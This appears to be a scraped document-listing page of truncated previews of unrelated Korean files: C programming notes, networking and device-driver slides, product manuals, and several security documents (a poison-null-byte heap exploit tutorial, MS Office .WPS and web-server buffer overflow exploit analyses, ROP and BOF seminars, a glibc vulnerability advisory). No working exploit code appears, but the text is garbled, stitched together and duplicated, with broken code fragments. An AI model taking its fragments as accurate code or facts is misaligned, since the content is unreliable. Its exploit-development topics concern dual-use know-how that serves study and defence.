침입방지솔루션도입검토보고서 IT 2005. 06. 02. IT IT Windows 3503 4463 4178 64% Solaris 142 56 36 Digital UX 37 24 9 Tru64 30 20 26 Server & DeskTop UNIX HP-UX 27 IRIX 19 FreeBSD 12 7 15 8 5 17 9 2% AIX 5 3 3 Linux 348 400 516 8% Apple

More information

61 62 63 64 234 235 p r i n t f ( % 5 d :, i+1); g e t s ( s t u d e n t _ n a m e [ i ] ) ; if (student_name[i][0] == \ 0 ) i = MAX; p r i n t f (\ n :\ n ); 6 1 for (i = 0; student_name[i][0]!= \ 0&&

More information

歯7장.PDF

歯7장.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

chap7.PDF

chap7.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow

More information

Microsoft Word - MSOffice_WPS_analysis.doc

Microsoft Word - MSOffice_WPS_analysis.doc MS Office.WPS File Stack Overflow Exploit 분석 (http://milw0rm.com/ 에공개된 exploit 분석 ) 2008.03.03 v0.5 By Kancho ( kancholove@gmail.com, www.securityproof.net ) milw0rm.com에 2008년 2월 13일에공개된 Microsoft Office.WPS

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

Solaris Express Developer Edition

Solaris Express Developer Edition Solaris Express Developer Edition : 2008 1 Solaris TM Express Developer Edition Solaris OS. Sun / Solaris, Java, Web 2.0,,. Developer Solaris Express Developer Edition System Requirements. 768MB. SPARC

More information

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2 SDN DDoS (whchoi@cisco.com) Cisco Systems Korea 2008 Cisco Systems, Inc. All rights reserved. 1 Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2 Cisco SDN 3.0

More information

슬라이드 1

슬라이드 1 / 유닉스시스템개요 / 파일 / 프로세스 01 File Descriptor file file descriptor file type unix 에서의파일은단지바이트들의나열임 operating system 은파일에어떤포맷도부과하지않음 파일의내용은바이트단위로주소를줄수있음 file descriptor 는 0 이나양수임 file 은 open 이나 creat 로 file

More information

hlogin7

hlogin7 0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

Microsoft Word - readme.doc

Microsoft Word - readme.doc ========================================================= 제 1 회광주과기원정보통신공학과 SW 경진대회 (Hacking 경진대회 ) 대회시작 : 2002 년 8 월 8 일 ( 목 ) 오후 9:00 ( 한국시간, GMT+9:00) 대회종료 : 2002 년 8 월 10 일 ( 토 ) 오후 9:00 ( 한국시간, GMT+9:00)

More information

슬라이드 1

슬라이드 1 DHCP (Dynamic Host Configuration Protocol) Oct 2006 Technical Support Div. Tel : 031-739-6800 Mail : support@corecess.com DHCP Motivations Automatic network configuration for clients No administrator intervention

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 KeyPad Device Control - Device driver Jo, Heeseung HBE-SM5-S4210 에는 16 개의 Tack Switch 를사용하여 4 행 4 열의 Keypad 가장착 4x4 Keypad 2 KeyPad 를제어하기위하여 FPGA 내부에 KeyPad controller 가구현 KeyPad controller 16bit 로구성된

More information

T100MD+

T100MD+ User s Manual 100% ) ( x b a a + 1 RX+ TX+ DTR GND TX+ RX+ DTR GND RX+ TX+ DTR GND DSR RX+ TX+ DTR GND DSR [ DCE TYPE ] [ DCE TYPE ] RS232 Format Baud 1 T100MD+

More information

PCServerMgmt7

PCServerMgmt7 Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network

More information

02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C

02.Create a shellcode that executes /bin/sh Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes /bin/sh C 02.Create a shellcode that executes "/bin/sh" Excuse the ads! We need some help to keep our site up. List Create a shellcode that executes "/bin/sh" C language Assembly code Change permissions(seteuid())

More information

C# Programming Guide - Types

C# Programming Guide - Types C# Programming Guide - Types 최도경 lifeisforu@wemade.com 이문서는 MSDN 의 Types 를요약하고보충한것입니다. http://msdn.microsoft.com/enus/library/ms173104(v=vs.100).aspx Types, Variables, and Values C# 은 type 에민감한언어이다. 모든

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Network Programming Jo, Heeseung Network 실습 네트워크프로그래밍 멀리떨어져있는호스트들이서로데이터를주고받을수있도록프로그램을구현하는것 파일과는달리데이터를주고받을대상이멀리떨어져있기때문에소프트웨어차원에서호스트들간에연결을해주는장치가필요 이러한기능을해주는장치로소켓이라는인터페이스를많이사용 소켓프로그래밍이란용어와네트워크프로그래밍이랑용어가같은의미로사용

More information

The Pocket Guide to TCP/IP Sockets: C Version

The Pocket Guide to  TCP/IP Sockets: C Version 인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)

More information

0125_ 워크샵 발표자료_완성.key

0125_ 워크샵 발표자료_완성.key WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress is installed on a web server, which either is part of an Internet hosting service or is a network host

More information

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - (Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register

More information

3ÆÄÆ®-11

3ÆÄÆ®-11 Chapter 11 Chapter 12 Chapter 13 Chapter 14 Chapter 15 Chapter 16 Chapter 17 C # N e t w o r k P r o g r a m m i n g Part 3 _ chapter 11 ICMP >>> 430 Chapter 11 _ 1 431 Part 3 _ 432 Chapter 11 _ N o t

More information

OPCTalk for Hitachi Ethernet 1 2. Path. DCOMwindow NT/2000 network server. Winsock update win95. . . 3 Excel CSV. Update Background Thread Client Command Queue Size Client Dynamic Scan Block Block

More information

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co

INTRO Basic architecture of modern computers Basic and most used assembly instructions on x86 Installing an assembly compiler and RE tools Practice co Basic reverse engineering on x86 This is for those who want to learn about basic reverse engineering on x86 (Feel free to use this, email me if you need a keynote version.) v0.1 SeungJin Beist Lee beist@grayhash.com

More information

Observational Determinism for Concurrent Program Security

Observational Determinism for  Concurrent Program Security 웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구

More information

Microsoft PowerPoint - 4. 스캐닝-2(11.21) [호환 모드]

Microsoft PowerPoint - 4. 스캐닝-2(11.21) [호환 모드] 정보보호 Scanning 목차 Ⅳ. 스캐닝 (Scanning) 1. 활성화된호스트식별 3. 서비스및운영체제스캔 4. 프로토콜스캔 5. 기타스캔 스캔 TCP연결설정 -3way handshaking TCP연결종료 -4way handshaking SYN FIN ( 연결종료요청 ) SYN + ACK ACK ( 연결종료승인 ) FIN ( 연결종료요청 ) ACK ACK

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING

More information

No Slide Title

No Slide Title Copyright, 2017 Multimedia Lab., UOS 시스템프로그래밍 (Assembly Code and Calling Convention) Seong Jong Choi chois@uos.ac.kr Multimedia Lab. Dept. of Electrical and Computer Eng. University of Seoul Seoul, Korea

More information

untitled

untitled Step Motor Device Driver Embedded System Lab. II Step Motor Step Motor Step Motor source Embedded System Lab. II 2 open loop, : : Pulse, 1 Pulse,, -, 1 +5%, step Step Motor (2),, Embedded System Lab. II

More information

휠세미나3 ver0.4

휠세미나3 ver0.4 andromeda@sparcs:/$ ls -al dev/sda* brw-rw---- 1 root disk 8, 0 2014-06-09 18:43 dev/sda brw-rw---- 1 root disk 8, 1 2014-06-09 18:43 dev/sda1 brw-rw---- 1 root disk 8, 2 2014-06-09 18:43 dev/sda2 andromeda@sparcs:/$

More information

歯9장.PDF

歯9장.PDF 9 Hello!! C printf() scanf() getchar() putchar() gets() puts() fopen() fclose() fprintf() fscant() fgetc() fputs() fgets() gputs() fread() fwrite() fseek() ftell() I/O 2 (stream) C (text stream) : `/n'

More information

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper Windows Netra Blade X3-2B( Sun Netra X6270 M3 Blade) : E37790 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs,

More information

Linux Binary Hardening with Glibc Hyeonho Seo

Linux Binary Hardening with Glibc Hyeonho Seo Linux Binary Hardening with Glibc Hyeonho Seo About Me 서현호(Hyeonho Seo) KDMHS 재학 중인 파릇한(?) 고등학 생 게임/팀플 빼고는 우분투만 사용 관심 분야는 상당히 잡식성 POSIX System Hacking Linux Kernel Programming Network Protocol C, Modern

More information

13주-14주proc.PDF

13주-14주proc.PDF 12 : Pro*C/C++ 1 2 Embeded SQL 3 PRO *C 31 C/C++ PRO *C NOT! NOT AND && AND OR OR EQUAL == = SQL,,, Embeded SQL SQL 32 Pro*C C SQL Pro*C C, C Pro*C, C C 321, C char : char[n] : n int, short, long : float

More information

Microsoft PowerPoint - a10.ppt [호환 모드]

Microsoft PowerPoint - a10.ppt [호환 모드] Structure Chapter 10: Structures t and Macros Structure 관련된변수들의그룹으로이루어진자료구조 template, pattern field structure를구성하는변수 (cf) C언어의 struct 프로그램의 structure 접근 entire structure 또는 individual fields Structure는

More information

자바-11장N'1-502

자바-11장N'1-502 C h a p t e r 11 java.net.,,., (TCP/IP) (UDP/IP).,. 1 ISO OSI 7 1977 (ISO, International Standards Organization) (OSI, Open Systems Interconnection). 6 1983 X.200. OSI 7 [ 11-1] 7. 1 (Physical Layer),

More information

untitled

untitled Embedded System Lab. II Embedded System Lab. II 2 RTOS Hard Real-Time vs Soft Real-Time RTOS Real-Time, Real-Time RTOS General purpose system OS H/W RTOS H/W task Hard Real-Time Real-Time System, Hard

More information

Sena Technologies, Inc. HelloDevice Super 1.1.0

Sena Technologies, Inc. HelloDevice Super 1.1.0 HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision

More information

Microsoft Word - ExecutionStack

Microsoft Word - ExecutionStack Lecture 15: LM code from high level language /* Simple Program */ external int get_int(); external void put_int(); int sum; clear_sum() { sum=0; int step=2; main() { register int i; static int count; clear_sum();

More information

11장 포인터

11장 포인터 Dynamic Memory and Linked List 1 동적할당메모리의개념 프로그램이메모리를할당받는방법 정적 (static) 동적 (dynamic) 정적메모리할당 프로그램이시작되기전에미리정해진크기의메모리를할당받는것 메모리의크기는프로그램이시작하기전에결정 int i, j; int buffer[80]; char name[] = data structure"; 처음에결정된크기보다더큰입력이들어온다면처리하지못함

More information

Microsoft Word - KPMC-400,401 SW 사용 설명서

Microsoft Word - KPMC-400,401 SW 사용 설명서 LKP Ethernet Card SW 사용설명서 Version Information Tornado 2.0, 2.2 알 림 여기에실린내용은제품의성능향상과신뢰도의증대를위하여예고없이변경될수도있습니다. 여기에실린내용의일부라도엘케이일레븐의사전허락없이어떠한유형의매체에복사되거나저장될수없으며전기적, 기계적, 광학적, 화학적인어떤방법으로도전송될수없습니다. 엘케이일레븐경기도성남시중원구상대원동

More information

Backup Exec

Backup Exec (sjin.kim@veritas.com) www.veritas veritas.co..co.kr ? 24 X 7 X 365 Global Data Access.. 100% Storage Used Terabytes 9 8 7 6 5 4 3 2 1 0 2000 2001 2002 2003 IDC (TB) 93%. 199693,000 TB 2000831,000 TB.

More information

Sun Java System Messaging Server 63 64

Sun Java System Messaging Server 63 64 Sun Java System Messaging Server 6.3 64 Sun Java TM System Communications Suite Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 820 2868 2007 7 Copyright 2007 Sun Microsystems,

More information

2-11Àå

2-11Àå Chapter 11 script kiddies.... 24.., script kiddies..,... 215 1 TCP/IP., TCP/IP. IP IP..,. IP. TCP/IP TCP( UDP).. 0 65535.., IP, IP,,. (, ). 216 Chapter 11 IP. IP.... 1024 (0 1023 ).... A B. B IP, A. IP,

More information

Microsoft PowerPoint - 04-UDP Programming.ppt

Microsoft PowerPoint - 04-UDP Programming.ppt Chapter 4. UDP Dongwon Jeong djeong@kunsan.ac.kr http://ist.kunsan.ac.kr/ Dept. of Informatics & Statistics 목차 UDP 1 1 UDP 개념 자바 UDP 프로그램작성 클라이언트와서버모두 DatagramSocket 클래스로생성 상호간통신은 DatagramPacket 클래스를이용하여

More information

A Dynamic Grid Services Deployment Mechanism for On-Demand Resource Provisioning

A Dynamic Grid Services Deployment Mechanism for On-Demand Resource Provisioning C Programming Practice (II) Contents 배열 문자와문자열 구조체 포인터와메모리관리 구조체 2/17 배열 (Array) (1/2) 배열 동일한자료형을가지고있으며같은이름으로참조되는변수들의집합 배열의크기는반드시상수이어야한다. type var_name[size]; 예 ) int myarray[5] 배열의원소는원소의번호를 0 부터시작하는색인을사용

More information

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation 1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP

More information

GNU/Linux 1, GNU/Linux MS-DOS LOADLIN DOS-MBR LILO DOS-MBR LILO... 6

GNU/Linux 1, GNU/Linux MS-DOS LOADLIN DOS-MBR LILO DOS-MBR LILO... 6 GNU/ 1, qkim@pecetrirekr GNU/ 1 1 2 2 3 4 31 MS-DOS 5 32 LOADLIN 5 33 DOS- LILO 6 34 DOS- 6 35 LILO 6 4 7 41 BIOS 7 42 8 43 8 44 8 45 9 46 9 47 2 9 5 X86 GNU/LINUX 10 1 GNU/, GNU/ 2, 3, 1 : V 11, 2001

More information

Microsoft PowerPoint - thesis_rone.ppt

Microsoft PowerPoint - thesis_rone.ppt 엔터프라이즈네트워크에서인터넷웜의실시간탐지방법 포항공과대학교정보통신대학원정보통신학과 분산시스템과네트워크관리연구실 2005 년 12 월 21 일 조룡권 rone@postech.ac.kr 목차 서론 연구의필요성과목표 관련연구 인터넷웜탐지알고리즘 웜트래픽발생툴 알고리즘의검증 네트워크에서의탐지결과분석 결론 (2) 서론 (1) 인터넷웜은전파속도가빠르고네트워크의마비를일으킴

More information

Chap7.PDF

Chap7.PDF Chapter 7 The SUN Intranet Data Warehouse: Architecture and Tools All rights reserved 1 Intranet Data Warehouse : Distributed Networking Computing Peer-to-peer Peer-to-peer:,. C/S Microsoft ActiveX DCOM(Distributed

More information

Microsoft PowerPoint - 2.Catalyst Switch Intrastructure Protection_이충용_V1 0.ppt [호환 모드]

Microsoft PowerPoint - 2.Catalyst Switch Intrastructure Protection_이충용_V1 0.ppt [호환 모드] Catalyst Switch Infrastructure Protection Cisco Systems Korea SE 이충용 (choolee@cisco.com) Overview DoS (Denial of Service) 공격대상 - Server Resource - Network Resource - Network devices (Routers, Firewalls

More information

MPLAB C18 C

MPLAB C18 C MPLAB C18 C MPLAB C18 MPLAB C18 C MPLAB C18 C #define START, c:\mcc18 errorlevel{0 1} char isascii(char ch); list[list_optioin,list_option] OK, Cancel , MPLAB IDE User s Guide MPLAB C18 C

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Development Environment 2 Jo, Heeseung make make Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one It

More information

<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D> 리눅스 오류처리하기 2007. 11. 28 안효창 라이브러리함수의오류번호얻기 errno 변수기능오류번호를저장한다. 기본형 extern int errno; 헤더파일 라이브러리함수호출에실패했을때함수예 정수값을반환하는함수 -1 반환 open 함수 포인터를반환하는함수 NULL 반환 fopen 함수 2 유닉스 / 리눅스 라이브러리함수의오류번호얻기 19-1

More information

Sena Device Server Serial/IP TM Version

Sena Device Server Serial/IP TM Version Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com

More information

untitled

untitled 1 hamks@dongguk.ac.kr (goal) (abstraction), (modularity), (interface) (efficient) (robust) C Unix C Unix (operating system) (network) (compiler) (machine architecture) 1 2 3 4 5 6 7 8 9 10 ANSI C Systems

More information

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf(hihi\n); } warning: conflicting types for functiona 이름 : 학번 : A. True or False: 각각항목마다 True 인지 False 인지적으세요. 1. (Python:) randint 함수를사용하려면, random 모듈을 import 해야한다. 2. (Python:) '' (single quote) 는한글자를표현할때, (double quote) 는문자열을표현할때사용한다. B. 다음에러를수정하는방법을적으세요.

More information

윤석언 - Buffer Overflow - 윤석언 제12회세미나 수원대학교보안동아리 FLAG

윤석언 - Buffer Overflow - 윤석언 제12회세미나 수원대학교보안동아리 FLAG - Buffer Overflow - 윤석언 SlaxCore@gmailcom 제12회세미나 수원대학교보안동아리 FLAG http://flagsuwonackr - 1 - < BOF(Buffer OverFlow) > - Stack 기반 - Heap 기반 # 기초 : Stack 기반의 BOF 스택 : 기본적으로 2개의 operation(push, pop) 과 1 개의변수(top)

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

LXR 설치 및 사용법.doc

LXR 설치 및 사용법.doc Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess

More information

Interstage5 SOAP서비스 설정 가이드

Interstage5 SOAP서비스 설정 가이드 Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

리눅스 취약점대응방안권고 / KISA 취약점점검팀 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE 지정, 도메인네임을

리눅스 취약점대응방안권고 / KISA 취약점점검팀 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE 지정, 도메인네임을 리눅스 취약점대응방안권고 15. 01. 29 / KISA 취약점점검팀 15. 01. 30 영향받는플랫폼 OS, FAQ 추가 개요 미국보안회사 에의해 시스템의 라이브러리 의특정함수에서임의코드를실행할수있는취약점이공개 해당취약점은 CVE-2015-0235 지정, 도메인네임을 IP로변환하는기능이포함된서비스 ( 메일, 웹등 ) 들은해당취약점에영향을받을수있음 취약점상세분석

More information